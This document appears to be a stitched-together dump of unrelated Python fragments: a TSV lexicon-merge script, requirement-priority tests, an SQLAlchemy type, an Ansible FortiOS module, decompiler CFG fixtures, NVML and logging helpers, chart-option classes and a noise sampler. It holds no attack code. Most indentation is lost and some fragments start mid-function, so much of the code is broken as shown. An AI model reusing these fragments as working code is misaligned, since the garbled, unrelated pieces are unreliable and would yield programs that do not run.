ap.add_argument('--separator', '-s', action='store', default='\t', metavar='SEP', help='use SEP as separator')
    ap.add_argument('--comment', '-C', action='append', default=['#'], metavar='COMMENT', help='skip lines starting with COMMENT that do not have SEPs')
ap.add_argument('--strip', '-S', action='store', metavar='STRIP', help='strip STRIP from fields before using')
ap.add_argument('--ignore-errors', '-I', action='store_true', default=False, help='silently ignore references to entries missing from master file')
args = ap.parse_args()
if ((args.strip == '"') or (args.strip == "'")):
quoting = csv.QUOTE_ALL
else:
quoting = csv.QUOTE_NONE
linecount = 0
entry_count = 0
lexdata = dict()
with open(args.infilename, 'r', newline='') as tsv_file:
if args.verbose:
print('Reading dictionary from', args.infilename)
tsv_reader = csv.DictReader(tsv_file, delimiter=args.separator, strict=True)
for tsv_parts in tsv_reader:
if ((len(tsv_parts) < 2) or (tsv_parts['lemma'] == None) or (tsv_parts['homonym'] == None)):
print('Too few tabs on line, skipping:', tsv_parts)
continue
lexkey = ((tsv_parts['lemma'] + '\t') + tsv_parts['homonym'])
            lexdata[lexkey] = tsv_parts
            entry_count += 1
if args.verbose:
print('\n', entry_count, 'entries in database')
with open(args.mergefilename, 'r', newline='') as tsv_file:
if args.verbose:
print('Reading merges from', args.mergefilename)
linecount = 0
merged = 0
added = 0
missed = 0
tsv_reader = csv.DictReader(tsv_file, delimiter=args.separator, strict=True)
for tsv_parts in tsv_reader:
if ((len(tsv_parts) < 2) or (tsv_parts['lemma'] == None) or (tsv_parts['homonym'] == None) or (tsv_parts['origin'] == None)):
print('Too few tabs on line, skipping:', tsv_parts)
continue
lexkey = ((tsv_parts['lemma'] + '\t') + tsv_parts['homonym'])
if (lexkey in lexdata):
reflex = lexdata[lexkey]
if (reflex['new_para'] == tsv_parts['new_para']):
if (lexdata[lexkey]['origin'] == 'unk'):
lexdata[lexkey]['origin'] = tsv_parts['origin']
elif (tsv_parts['origin'] in lexdata[lexkey]['origin']):
pass
else:
lexdata[lexkey]['origin'] += ('|' + tsv_parts['origin'])
merged += 1
else:
lexparas = tsv_parts['new_para'].split('_')
refparas = lexdata[lexkey]['new_para'].split('_')
if (lexparas[0] == refparas[0]):
if args.verbose:
print('merging', lexkey, 'fuzzy match', lexparas, refparas)
if (lexdata[lexkey]['origin'] == 'unk'):
lexdata[lexkey]['origin'] = tsv_parts['origin']
elif (tsv_parts['origin'] in lexdata[lexkey]['origin']):
pass
else:
lexdata[lexkey]['origin'] += ('|' + tsv_parts['origin'])
else:
print('cannot merge (new, old):', tsv_parts, lexdata[lexkey], sep='\n')
missed += 1
else:
lexdata[lexkey] = tsv_parts
added += 1
print('Added', added, 'merged', merged, 'left', missed)
with open(args.outfilename, 'w') as output:
if args.verbose:
print('Writing master database to', args.outfilename)
print('Sorting')
linecount = 0
print('lemma', 'homonym', 'new_para', 'origin', sep='\t', file=output)
for (line, fields) in sorted(lexdata.items()):
linecount += 1
if (args.verbose and (((linecount % 10000) == 0) or (linecount == 1))):
print(linecount, '...', end='\r')
print(fields['lemma'], fields['homonym'], fields['new_para'], fields['origin'], sep='\t', file=output)
if args.verbose:
print()
exit() |
class RMTTestRDepPriority(object):
def rmttest_positive_01(self):
config = TestConfig()
reqset = RequirementSet(config)
req1 = Requirement('Name: A\nType: master requirement\nSolved by: B', 'A', None, None, None)
reqset.add_requirement(req1)
req2 = Requirement('Name: B\nType: requirement', 'B', None, None, None)
reqset.add_requirement(req2)
reqset.resolve_solved_by()
reqset.find_master_nodes()
reqset.build_named_nodes()
reqset.graph_master_node = reqset.get_named_node('A')
reqset.get_named_node('A').set_value('Factor', 1.0)
reqset.get_named_node('B').set_value('Factor', 0.8)
rdep = RDepPriority(config)
rdep.rewrite(reqset)
assert (1.0 == reqset.get_named_node('A').get_value('Priority'))
assert (0.8 == reqset.get_named_node('B').get_value('Priority'))
def rmttest_positive_02(self):
config = TestConfig()
reqset = RequirementSet(config)
req1 = Requirement('Name: A\nType: master requirement\nSolved by: B', 'A', None, None, None)
reqset.add_requirement(req1)
req2 = Requirement('Name: B\nType: requirement\nSolved by: C', 'B', None, None, None)
reqset.add_requirement(req2)
req3 = Requirement('Name: C\nType: requirement', 'C', None, None, None)
reqset.add_requirement(req3)
reqset.resolve_solved_by()
reqset.find_master_nodes()
reqset.build_named_nodes()
reqset.graph_master_node = reqset.get_named_node('A')
reqset.get_named_node('A').set_value('Factor', 1.0)
reqset.get_named_node('B').set_value('Factor', 0.8)
reqset.get_named_node('C').set_value('Factor', 0.5)
rdep = RDepPriority(config)
rdep.rewrite(reqset)
assert (1.0 == reqset.get_named_node('A').get_value('Priority'))
assert (0.8 == reqset.get_named_node('B').get_value('Priority'))
assert (0.4 == reqset.get_named_node('C').get_value('Priority'))
def rmttest_positive_03(self):
config = TestConfig()
reqset = RequirementSet(config)
req1 = Requirement('Name: A\nType: master requirement\nSolved by: B C', 'A', None, None, None)
reqset.add_requirement(req1)
req2 = Requirement('Name: B\nType: requirement\nSolved by: D', 'B', None, None, None)
reqset.add_requirement(req2)
req3 = Requirement('Name: C\nType: requirement\nSolved by: D', 'C', None, None, None)
reqset.add_requirement(req3)
req4 = Requirement('Name: D\nType: requirement', 'D', None, None, None)
reqset.add_requirement(req4)
reqset.resolve_solved_by()
reqset.find_master_nodes()
reqset.build_named_nodes()
reqset.graph_master_node = reqset.get_named_node('A')
reqset.get_named_node('A').set_value('Factor', 1.0)
reqset.get_named_node('B').set_value('Factor', 0.2)
reqset.get_named_node('C').set_value('Factor', 0.4)
reqset.get_named_node('D').set_value('Factor', 0.5)
rdep = RDepPriority(config)
rdep.rewrite(reqset)
assert (1.0 == reqset.get_named_node('A').get_value('Priority'))
assert (0.2 == reqset.get_named_node('B').get_value('Priority'))
assert (0.4 == reqset.get_named_node('C').get_value('Priority'))
assert (0.2 == reqset.get_named_node('D').get_value('Priority')) |
class VersionStatusType(sqlalchemy.types.TypeDecorator):
impl = sqlalchemy.Integer
cache_ok = True
def process_bind_param(self, value: Optional[Union[(int, str, VersionStatus)]], dialect) -> Optional[int]:
if (value is None):
return None
elif isinstance(value, int):
return value
elif isinstance(value, str):
return VersionStatus[value].value
elif isinstance(value, VersionStatus):
return value.value
else:
raise InternalError('Unexpected type {} for value in VersionStatusType.process_bind_param'.format(type(value)))
def process_result_value(self, value: Optional[int], dialect) -> Optional[VersionStatus]:
if (value is not None):
return VersionStatus(value)
else:
return None |
class PropertyPreprocessorNode(RegistryNode):
type = NodeTypes.PREPROCESSOR
    @property
    def configured_preprocessor(self):
return self.config(self.item.get('properties', {}))
def process_arg(self, arg, node, raw_args):
return self.configured_preprocessor.process_arg(arg, node, raw_args)
def imports(self):
return self.configured_preprocessor.imports() |
def handle_hard_error():
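    # Exponential backoff: start at 60 s, double up to a 120-minute cap; after
    # three consecutive hard failures the session id is dropped, presumably to
    # force a fresh handshake on the next attempt.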
global SESSION_ID, HARD_FAILS, HS_DELAY
if (HS_DELAY == 0):
HS_DELAY = 60
elif (HS_DELAY < (120 * 60)):
HS_DELAY *= 2
if (HS_DELAY > (120 * 60)):
HS_DELAY = (120 * 60)
HARD_FAILS += 1
if (HARD_FAILS == 3):
SESSION_ID = None |
class BaseFilter(object):
report_fields = ('name', 'passed_unchanged', 'passed_changed', 'failed', 'total_filtered', 'proportion_passed')
def __init__(self, listener=None):
self.passed_unchanged = 0
self.passed_changed = 0
self.failed = 0
self.listener = listener
def filter_record(self, record):
raise NotImplementedError('Override in subclass')
def filter_records(self, records):
for record in records:
try:
filtered = self.filter_record(record)
assert filtered
if (filtered.seq == record.seq):
self.passed_unchanged += 1
else:
self.passed_changed += 1
                yield filtered
except FailedFilter as e:
self.failed += 1
v = e.value
if self.listener:
self.listener('failed_filter', record, filter_name=self.name, value=v)
    @property
    def passed(self):
        return (self.passed_changed + self.passed_unchanged)
    @property
    def total_filtered(self):
        return (self.passed + self.failed)
    @property
    def proportion_passed(self):
        if (not self.total_filtered):
            return 0
        return (float(self.passed) / self.total_filtered)
def report_dict(self):
return dict(((f, getattr(self, f)) for f in self.report_fields)) |
def graphs_test9():
cfg = ControlFlowGraph()
cfg.add_nodes_from((vertices := [BasicBlock(0, [Assignment(ListOperation([]), Call(imp_function_symbol('__x86.get_pc_thunk.bx'), [], Pointer(CustomType('void', 0), 32), 1)), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(5328, Pointer(CustomType('void', 0), 32)), UnaryOperation(OperationType.dereference, [Variable('arg1', Pointer(Integer(32, True), 32), 0, False)], Integer(32, True), None, False)], Pointer(CustomType('void', 0), 32), 2)), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(5328, Pointer(CustomType('void', 0), 32)), UnaryOperation(OperationType.dereference, [BinaryOperation(OperationType.plus, [(base1 := Variable('arg1', Pointer(Integer(32, True), 32), 0, False)), Constant(8, Integer(32, True))], Pointer(CustomType('void', 0), 32))], Integer(32, True), None, False)], Pointer(CustomType('void', 0), 32), 3))]), BasicBlock(1, [Phi(Variable('var_10', Integer(32, True), 2, False), [Constant(0, Integer(32, True)), Variable('var_10', Integer(32, True), 3, False)]), Branch(Condition(OperationType.less, [Variable('var_10', Integer(32, True), 2, False), Variable('arg2', Integer(32, True), 0, False)], CustomType('bool', 1)))]), BasicBlock(2, [Assignment(ListOperation([Variable('eax_7', Integer(32, True), 10, False)]), Call(imp_function_symbol('rand'), [], Pointer(CustomType('void', 0), 32), 5)), Assignment(UnaryOperation(OperationType.dereference, [BinaryOperation(OperationType.plus, [BinaryOperation(OperationType.left_shift, [(index2 := Variable('var_10', Integer(32, True), 2, False)), Constant(2, Integer(8, True))], Integer(32, True)), (base2 := Variable('arg1', Pointer(Integer(32, True), 32), 0, False))], Pointer(CustomType('void', 0), 32))], Integer(32, True), 6, False), Variable('eax_7', Integer(32, True), 10, False)), Assignment(Variable('var_10', Integer(32, True), 3, False), BinaryOperation(OperationType.plus, [Variable('var_10', Integer(32, True), 2, False), Constant(1, Integer(32, True))], Integer(32, True)))]), BasicBlock(3, [Return(ListOperation([Variable('var_10', Integer(32, True), 2, False)]))])]))
cfg.add_edges_from([UnconditionalEdge(vertices[0], vertices[1]), TrueCase(vertices[1], vertices[2]), FalseCase(vertices[1], vertices[3]), UnconditionalEdge(vertices[2], vertices[1])])
out_cfg = ControlFlowGraph()
out_cfg.add_nodes_from((vertices := [BasicBlock(0, [Assignment(ListOperation([]), Call(imp_function_symbol('__x86.get_pc_thunk.bx'), [], Pointer(CustomType('void', 0), 32), 1)), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(5328, Pointer(CustomType('void', 0), 32)), UnaryOperation(OperationType.dereference, [Variable('arg1', Pointer(Integer(32, True), 32), 0, False)], Integer(32, True), None, False)], Pointer(CustomType('void', 0), 32), 2)), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(5328, Pointer(CustomType('void', 0), 32)), UnaryOperation(OperationType.dereference, [BinaryOperation(OperationType.plus, [(base := Variable('arg1', Pointer(Integer(32, True), 32), 0, False)), Constant(8, Integer(32, True))], Pointer(CustomType('void', 0), 32))], Integer(32, True), None, False, array_info=ArrayInfo(base1, 2, True))], Pointer(CustomType('void', 0), 32), 3))]), BasicBlock(1, [Phi(Variable('var_10', Integer(32, True), 2, False), [Constant(0, Integer(32, True)), Variable('var_10', Integer(32, True), 3, False)]), Branch(Condition(OperationType.less, [Variable('var_10', Integer(32, True), 2, False), Variable('arg2', Integer(32, True), 0, False)], CustomType('bool', 1)))]), BasicBlock(2, [Assignment(ListOperation([Variable('eax_7', Integer(32, True), 10, False)]), Call(imp_function_symbol('rand'), [], Pointer(CustomType('void', 0), 32), 5)), Assignment(UnaryOperation(OperationType.dereference, [BinaryOperation(OperationType.plus, [BinaryOperation(OperationType.left_shift, [Variable('var_10', Integer(32, True), 2, False), Constant(2, Integer(8, True))], Integer(32, True)), Variable('arg1', Pointer(Integer(32, True), 32), 0, False)], Pointer(CustomType('void', 0), 32))], Integer(32, True), 6, False, array_info=ArrayInfo(base2, index2, True)), Variable('eax_7', Integer(32, True), 10, False)), Assignment(Variable('var_10', Integer(32, True), 3, False), BinaryOperation(OperationType.plus, [Variable('var_10', Integer(32, True), 2, False), Constant(1, Integer(32, True))], Integer(32, True)))]), BasicBlock(3, [Return(ListOperation([Variable('var_10', Integer(32, True), 2, False)]))])]))
out_cfg.add_edges_from([UnconditionalEdge(vertices[0], vertices[1]), TrueCase(vertices[1], vertices[2]), FalseCase(vertices[1], vertices[3]), UnconditionalEdge(vertices[2], vertices[1])])
return (cfg, out_cfg) |
def remove_empty_containers(row: RecursiveRow) -> RecursiveRow:
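    # Recursively prune empty dicts/lists bottom-up. The dict is iterated over a
    # copy so deletion is safe; the list is enumerated in reverse so pop(index)
    # does not shift the indices still to be visited. Note: mutates `row` in place.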
if isinstance(row, dict):
for (key, value) in row.copy().items():
if isinstance(value, (dict, list)):
value = remove_empty_containers(value)
if (value in [{}, []]):
del row[key]
elif isinstance(row, list):
for (index, elem) in reversed(list(enumerate(row))):
if isinstance(elem, (dict, list)):
elem = remove_empty_containers(elem)
if (elem in [{}, []]):
row.pop(index)
return row |
def main():
module_spec = schema_to_module_spec(versioned_schema)
mkeyname = 'name'
fields = {'access_token': {'required': False, 'type': 'str', 'no_log': True}, 'enable_log': {'required': False, 'type': 'bool', 'default': False}, 'vdom': {'required': False, 'type': 'str', 'default': 'root'}, 'member_path': {'required': False, 'type': 'str'}, 'member_state': {'type': 'str', 'required': False, 'choices': ['present', 'absent']}, 'state': {'required': True, 'type': 'str', 'choices': ['present', 'absent']}, 'firewall_vip6': {'required': False, 'type': 'dict', 'default': None, 'options': {}}}
for attribute_name in module_spec['options']:
fields['firewall_vip6']['options'][attribute_name] = module_spec['options'][attribute_name]
if (mkeyname and (mkeyname == attribute_name)):
fields['firewall_vip6']['options'][attribute_name]['required'] = True
module = AnsibleModule(argument_spec=fields, supports_check_mode=True)
check_legacy_fortiosapi(module)
is_error = False
has_changed = False
result = None
diff = None
versions_check_result = None
if module._socket_path:
connection = Connection(module._socket_path)
if ('access_token' in module.params):
connection.set_option('access_token', module.params['access_token'])
if ('enable_log' in module.params):
connection.set_option('enable_log', module.params['enable_log'])
else:
connection.set_option('enable_log', False)
fos = FortiOSHandler(connection, module, mkeyname)
versions_check_result = check_schema_versioning(fos, versioned_schema, 'firewall_vip6')
(is_error, has_changed, result, diff) = fortios_firewall(module.params, fos, module.check_mode)
else:
module.fail_json(**FAIL_SOCKET_MSG)
if (versions_check_result and (versions_check_result['matched'] is False)):
        module.warn('Ansible has detected version mismatch between FortiOS system and your playbook, see more details by specifying option -vvv')
if (not is_error):
if (versions_check_result and (versions_check_result['matched'] is False)):
module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result, diff=diff)
else:
module.exit_json(changed=has_changed, meta=result, diff=diff)
elif (versions_check_result and (versions_check_result['matched'] is False)):
module.fail_json(msg='Error in repo', version_check_warning=versions_check_result, meta=result)
else:
module.fail_json(msg='Error in repo', meta=result) |
@pytest.mark.parametrize('wiring_config', [containers.WiringConfiguration(modules=['.module'], packages=['.package'])])
def test_relative_names_with_auto_package():
service = module.test_function()
assert isinstance(service, Service)
from samples.wiring.package.subpackage.submodule import test_function
service = test_function()
assert isinstance(service, Service) |
@mock.patch('Updater._write_updates_status_flag_to_disk')
def test_should_run_updater_invalid_timestamp(mocked_write):
TEST_INTERVAL = 3600
with mock.patch('Updater.last_required_reboot_performed') as mocked_last:
mocked_last.return_value = True
with mock.patch('Updater.read_dom0_update_flag_from_disk') as mocked_read:
mocked_read.return_value = {'last_status_update': 'time to die', 'status': UpdateStatus.UPDATES_OK.value}
assert (updater.should_launch_updater(TEST_INTERVAL) is True) |
class TestNCLS(object):
def setup_class(cls):
pass
def teardown_class(cls):
pass
def setup_method(self, method):
reload(ncls)
self.pList = [ncls_p]
self.nList = [ncls_n]
self.sList = [default_s]
self.so = default_so
self.so.tnList = self.nList[0].tnList
self._scriptdir = os.path.dirname(__file__)
self.sim_names = []
self.aux_names = []
def teardown_method(self, method):
pass
def test_pure_advection_supg(self):
ncls.ct.level_set_function = 0
ncls.ct.STABILIZATION_TYPE = 0
ncls.ct.COUPEZ = False
ncls.ct.DO_REDISTANCING = False
reload(default_n)
reload(ncls_n)
reload(ncls_p)
self.so.name = (self.pList[0].name + '_pureAdvection_SUPG')
ns = proteus.NumericalSolution.NS_base(self.so, self.pList, self.nList, self.sList, opts)
self.sim_names.append(ns.modelList[0].name)
ns.calculateSolution('ncls')
actual = tables.open_file('ncls_level_0_pureAdvection_SUPG.h5', 'r')
expected_path = ((('comparison_files/' + 'comparison_') + 'ncls_level_0_pureAdvection_SUPG_') + '_u_t2.csv')
np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path), sep=','), np.array(actual.root.u_t2).flatten(), decimal=10)
actual.close()
def test_pure_advection_ev1(self):
ncls.ct.level_set_function = 0
ncls.ct.STABILIZATION_TYPE = 1
ncls.ct.SATURATED_LEVEL_SET = False
ncls.ct.ENTROPY_TYPE = 1
ncls.ct.COUPEZ = False
ncls.ct.DO_REDISTANCING = False
reload(default_n)
reload(ncls_n)
reload(ncls_p)
self.so.name = (self.pList[0].name + '_pureAdvection_EV1')
ns = proteus.NumericalSolution.NS_base(self.so, self.pList, self.nList, self.sList, opts)
self.sim_names.append(ns.modelList[0].name)
ns.calculateSolution('ncls')
actual = tables.open_file('ncls_level_0_pureAdvection_EV1.h5', 'r')
expected_path = ((('comparison_files/' + 'comparison_') + 'ncls_level_0_pureAdvection_EV1_') + '_u_t2.csv')
np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path), sep=','), np.array(actual.root.u_t2).flatten(), decimal=10)
actual.close()
def test_coupez_with_redistancing_non_saturated(self):
ncls.ct.level_set_function = 0
ncls.ct.STABILIZATION_TYPE = 1
ncls.ct.SATURATED_LEVEL_SET = False
ncls.ct.ENTROPY_TYPE = 1
ncls.ct.COUPEZ = True
ncls.ct.DO_REDISTANCING = True
reload(default_n)
reload(ncls_n)
reload(ncls_p)
self.so.name = (self.pList[0].name + '_non_saturated_ls')
ns = proteus.NumericalSolution.NS_base(self.so, self.pList, self.nList, self.sList, opts)
self.sim_names.append(ns.modelList[0].name)
ns.calculateSolution('ncls')
actual = tables.open_file('ncls_level_0_non_saturated_ls.h5', 'r')
expected_path = ((('comparison_files/' + 'comparison_') + 'ncls_level_0_non_saturated_ls_') + '_u_t2.csv')
np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path), sep=','), np.array(actual.root.u_t2).flatten(), decimal=10)
actual.close()
def test_coupez_with_redistancing_saturated(self):
ncls.ct.level_set_function = 1
ncls.ct.STABILIZATION_TYPE = 1
ncls.ct.SATURATED_LEVEL_SET = True
ncls.ct.ENTROPY_TYPE = 2
ncls.ct.COUPEZ = True
ncls.ct.DO_REDISTANCING = True
reload(default_n)
reload(ncls_n)
reload(ncls_p)
self.so.name = (self.pList[0].name + '_saturated_ls')
ns = proteus.NumericalSolution.NS_base(self.so, self.pList, self.nList, self.sList, opts)
self.sim_names.append(ns.modelList[0].name)
ns.calculateSolution('ncls')
actual = tables.open_file('ncls_level_0_saturated_ls.h5', 'r')
expected_path = ((('comparison_files/' + 'comparison_') + 'ncls_level_0_saturated_ls_') + '_u_t2.csv')
np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path), sep=','), np.array(actual.root.u_t2).flatten(), decimal=10)
actual.close() |
class SimpleVizGroup(lg.Group):
INPUT = lg.Topic(RandomMessage)
PLOT: ScatterPlot
WINDOW: Window
def setup(self) -> None:
self.PLOT.configure(ScatterPlotConfig(x_field='x', y_field='y', labels={'bottom': 'Bottom Label', 'left': 'Left Label'}, styles={'red': ScatterPlotStyle(symbol='x', symbolSize=10, symbolBrush='r', name='red'), 'green': ScatterPlotStyle(symbol='x', symbolSize=10, symbolBrush='g', name='green')}))
self.WINDOW.PLOT = self.PLOT
def connections(self) -> lg.Connections:
return ((self.INPUT, self.PLOT.INPUT),) |
class JsNvd3Bar(JsNvd3):
chartFnc = 'discreteBarChart'
def x(self, column=None, js_funcs=None, profile=False):
if (column is not None):
self.fnc(('x(function(d){return d.%s})' % column))
elif (js_funcs is not None):
self.fnc(('x(%s)' % JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile)))
return self
def y(self, column=None, js_funcs=None, profile=False):
if (column is not None):
self.fnc(('y(function(d){return d.%s})' % column))
elif (js_funcs is not None):
self.fnc(('y(%s)' % JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile)))
return self
def color(self, colors: list):
self.fnc(('color(%s)' % JsUtils.jsConvertData(colors, None)))
return self
def rotateLabels(self, value):
self.fnc(('rotateLabels(%s)' % value))
return self
    def reduceXTicks(self, flag: bool):
        # bodies of the next three methods were lost in the dump; restored on the
        # assumption they follow the same pattern as showValues below
        self.fnc(('reduceXTicks(%s)' % JsUtils.jsConvertData(flag, None)))
        return self
    def staggerLabels(self, flag: bool):
        self.fnc(('staggerLabels(%s)' % JsUtils.jsConvertData(flag, None)))
        return self
    def tooltips(self, flag: bool):
        self.fnc(('tooltips(%s)' % JsUtils.jsConvertData(flag, None)))
        return self
    def showValues(self, flag: bool):
        self.fnc(('showValues(%s)' % JsUtils.jsConvertData(flag, None)))
        return self
def groupSpacing(self, value):
raise NotImplementedError() |
def test_normalize_smallest_cool(capsys):
outfile_one = NamedTemporaryFile(suffix='.cool', delete=False)
outfile_one.close()
outfile_two = NamedTemporaryFile(suffix='.cool', delete=False)
outfile_two.close()
args = '--matrices {} {} --normalize smallest -o {} {}'.format(matrix_one_cool, matrix_two_cool, outfile_one.name, outfile_two.name).split()
compute(hicNormalize.main, args, 5)
test_one = hm.hiCMatrix((ROOT + '/smallest_one.cool'))
test_two = hm.hiCMatrix((ROOT + '/smallest_two.cool'))
new_one = hm.hiCMatrix(outfile_one.name)
new_two = hm.hiCMatrix(outfile_two.name)
nt.assert_equal(test_one.matrix.data, new_one.matrix.data)
nt.assert_equal(test_one.cut_intervals, new_one.cut_intervals)
nt.assert_equal(test_two.matrix.data, new_two.matrix.data)
nt.assert_equal(test_two.cut_intervals, new_two.cut_intervals)
os.unlink(outfile_one.name)
os.unlink(outfile_two.name) |
def get_labeled_model_data_list_for_layout_document(layout_document: LayoutDocument, model: Model, document_features_context: DocumentFeaturesContext) -> Sequence[LabeledLayoutModelData]:
data_generator = model.get_data_generator(document_features_context=document_features_context)
model_data_list: Sequence[LayoutModelData] = list(data_generator.iter_model_data_for_layout_document(layout_document))
return get_labeled_model_data_list(model_data_list, model=model) |
class OptionPlotoptionsBarOnpoint(Options):
    @property
    def connectorOptions(self) -> 'OptionPlotoptionsBarOnpointConnectoroptions':
        return self._config_sub_data('connectorOptions', OptionPlotoptionsBarOnpointConnectoroptions)
    @property
    def id(self):
        return self._config_get(None)
    @id.setter
    def id(self, text: str):
        self._config(text, js_type=False)
    @property
    def position(self) -> 'OptionPlotoptionsBarOnpointPosition':
        return self._config_sub_data('position', OptionPlotoptionsBarOnpointPosition) |
def includeme(config):
settings = config.registry.settings
session_provider_callable_config = settings.get(('%s.session_provider_callable' % CONFIG_KEY))
try_global_session = False
if (not session_provider_callable_config):
def session_provider_callable(request):
return get_db_session()
try_global_session = True
elif callable(session_provider_callable_config):
session_provider_callable = session_provider_callable_config
else:
parts = session_provider_callable_config.split(':')
_tmp = importlib.import_module(parts[0])
session_provider_callable = getattr(_tmp, parts[1])
def get_user(request):
userid = request.unauthenticated_userid
if try_global_session:
db_session = None
else:
db_session = session_provider_callable(request)
if (userid is not None):
return UserService.by_id(userid, db_session=db_session)
config.add_request_method(get_user, 'user', reify=True, property=True) |
class FLCoreLogger():
_instance = None
def __new__(cls):
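        # Singleton: the first call builds the shared instance and its formatter
        # (tagged with the process name); later calls return the same object.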
if (cls._instance is None):
cls._instance = super().__new__(cls)
process_name = get_process_name()
fmt = '{}[%(process)d] %(levelname)s: %(module)s: %(name)s: %(message)s'.format(process_name)
cls.formatter = logging.Formatter(fmt=fmt)
return cls._instance
def get_syslog_handler(self):
syslog_handler = SysLogHandler(address='/dev/log')
syslog_handler.setFormatter(self.formatter)
syslog_handler.name = 'syslogHandler'
return syslog_handler
def get_console_handler(self):
console_handler = logging.StreamHandler()
console_handler.setFormatter(self.formatter)
console_handler.name = 'consoleHandler'
return console_handler
def add_handlers(self, logger, handler_list: list):
existing_handler_names = []
for existing_handler in logger.handlers:
existing_handler_names.append(existing_handler.name)
for new_handler in handler_list:
if (new_handler.name not in existing_handler_names):
logger.addHandler(new_handler)
def get_logger(self, logger_name: str):
_logger = logging.getLogger(logger_name)
console_handler = self.get_console_handler()
syslog_handler = self.get_syslog_handler()
self.add_handlers(_logger, [syslog_handler, console_handler])
_logger.propagate = False
error_override(_logger)
return _logger
def set_level(self, level_name: str):
if (level_name == 'debug'):
log_level = logging.DEBUG
elif (level_name == 'info'):
log_level = logging.INFO
elif (level_name == 'error'):
log_level = logging.ERROR
elif (level_name == 'critical'):
log_level = logging.CRITICAL
else:
log_level = logging.WARNING
logging.root.setLevel(log_level) |
class _PyperfComparison():
kind: Optional[str] = None
    @classmethod
    def from_raw(cls, raw: Any, *, fail: Optional[bool]=None) -> Optional['_PyperfComparison']:
if (not raw):
if fail:
raise ValueError(f'missing {cls.kind}')
return None
elif isinstance(raw, cls):
return raw
else:
if (fail or (fail is None)):
raise TypeError(raw)
return None
    @classmethod
    def _parse_value(cls, valuestr: str) -> Any:
return _utils.ElapsedTimeWithUnits.parse(valuestr, fail=True)
def __init__(self, source: Any, byname: Optional[Dict[(str, str)]]=None):
_utils.check_str(source, 'source', required=True, fail=True)
if (not os.path.isabs(source)):
raise ValueError(f'expected an absolute source, got {source!r}')
_byname: Dict[(str, Any)] = {}
if byname:
for (name, value) in byname.items():
assert (name and isinstance(name, str)), (name, value, byname)
assert (value and isinstance(value, str)), (name, value, byname)
_byname[name] = self._parse_value(value)
self._source = source
self._byname = _byname
def __repr__(self):
return f'{type(self).__name__}({self._source!r}, {self._byname!r})'
def __str__(self):
return f'<{self.kind} {self._source!r}>'
def __hash__(self):
try:
return self._hash
except AttributeError:
self._hash = hash(self._as_hashable())
return self._hash
def __eq__(self, other):
if (not isinstance(other, _PyperfComparison)):
return NotImplemented
if (self._source != other._source):
return False
if (self._byname != other._byname):
return False
return True
def _as_hashable(self) -> Tuple[(Any, Tuple)]:
return (self._source, (tuple(sorted(self._byname.items())) if self._byname else ()))
    @property
    def source(self) -> str:
return self._source
    @property
    def byname(self) -> Dict[(str, Any)]:
return dict(self._byname) |
# NOTE: the decorator name prefixes were stripped from this source; only the
# "_required" suffixes survived. The names below are reconstructions.
@login_required
@admin_required
def tasklog(request, hostname):
context = collect_view_data(request, 'node_list')
context['node'] = node = get_node(request, hostname)
context['nodes'] = (node,)
context['submenu_auto'] = ''
nss = node.nodestorage_set.all().extra(select={'strid': 'CAST(id AS text)'}).values_list('strid', flat=True)
log_query = ((Q(content_type=node.get_content_type()) & Q(object_pk=node.pk)) | (Q(content_type=NodeStorage.get_content_type()) & Q(object_pk__in=nss)))
log = get_tasklog(request, context=context, base_query=log_query, filter_by_permissions=False)
context['tasklog'] = context['pager'] = tasklog_items = get_pager(request, log, per_page=100)
TaskLogEntry.prepare_queryset(tasklog_items)
return render(request, 'gui/node/tasklog.html', context) |
def sram_test(comm, port):
wb = comms[comm](port=port, csr_csv='csr.csv')
wb.open()
def mem_dump(base, length):
for addr in range(base, (base + length), 4):
if ((addr % 16) == 0):
if (addr != base):
print('')
print('0x{:08x}'.format(addr), end=' ')
data = wb.read(addr)
for i in reversed(range(4)):
print('{:02x}'.format(((data >> (8 * i)) & 255)), end=' ')
print('')
def mem_write(base, datas):
for (n, addr) in enumerate(range(base, (base + (4 * len(datas))), 4)):
if ((addr % 16) == 0):
if (addr != base):
print('')
print('0x{:08x}'.format(addr), end=' ')
data = datas[n]
for i in reversed(range(4)):
print('{:02x}'.format(((data >> (8 * i)) & 255)), end=' ')
wb.write(addr, data)
print('')
print('Fill SRAM with counter:')
mem_write(wb.mems.sram.base, [i for i in range((128 // 4))])
print('')
print('Dump SRAM:')
mem_dump(wb.mems.sram.base, 128)
print('')
print('Fill SRAM with 4 32-bit words:')
    mem_write(wb.mems.sram.base, [0x01234567, 0x89abcdef, 0x5aa55aa5, 0xa55aa55a])  # placeholder words; the original four constants were elided from this source
print('')
print('Dump SRAM:')
mem_dump(wb.mems.sram.base, 128)
print('')
wb.close() |
def nvmlUnitGetDevices(unit):
c_count = c_uint(nvmlUnitGetDeviceCount(unit))
device_array = (c_nvmlDevice_t * c_count.value)
c_devices = device_array()
fn = _nvmlGetFunctionPointer('nvmlUnitGetDevices')
ret = fn(unit, byref(c_count), c_devices)
_nvmlCheckReturn(ret)
return bytes_to_str(c_devices) |
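# Hedged usage sketch for the wrapper above: list the devices attached to an
# S-class unit via pynvml. Unit index 0 is illustrative; units only exist on
# S-class systems.
nvmlInit()
try:
    unit = nvmlUnitGetHandleByIndex(0)
    for device in nvmlUnitGetDevices(unit):
        print(nvmlDeviceGetName(device))
finally:
    nvmlShutdown() |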
def sample_noise(size: tuple[(int, ...)], offset_noise: float=0.1, device: (Device | str)='cpu', dtype: (DType | None)=None, generator: (Generator | None)=None) -> Tensor:
device = Device(device)
noise = randn(*size, generator=generator, device=device, dtype=dtype)
return (noise + (offset_noise * randn(*size[:2], 1, 1, generator=generator, device=device, dtype=dtype))) |
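# Sketch of how sample_noise() implements "offset noise": a per-(batch, channel)
# constant is added on top of the usual Gaussian noise, which lets a diffusion
# model learn global brightness shifts. The latent shape and seed below are
# illustrative assumptions.
from torch import Generator
gen = Generator().manual_seed(0)
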